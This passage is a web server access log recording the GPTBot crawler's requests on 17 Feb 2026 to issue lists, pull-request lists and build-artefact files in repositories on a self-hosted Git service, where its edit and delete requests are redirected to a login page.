git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:19:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13416] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11337] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11338] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12536] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11254] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:19:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:37:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 12011] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:19:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10688] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs" [Client 74.7.227.38] [Length 20671] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:19:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:19:37:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr 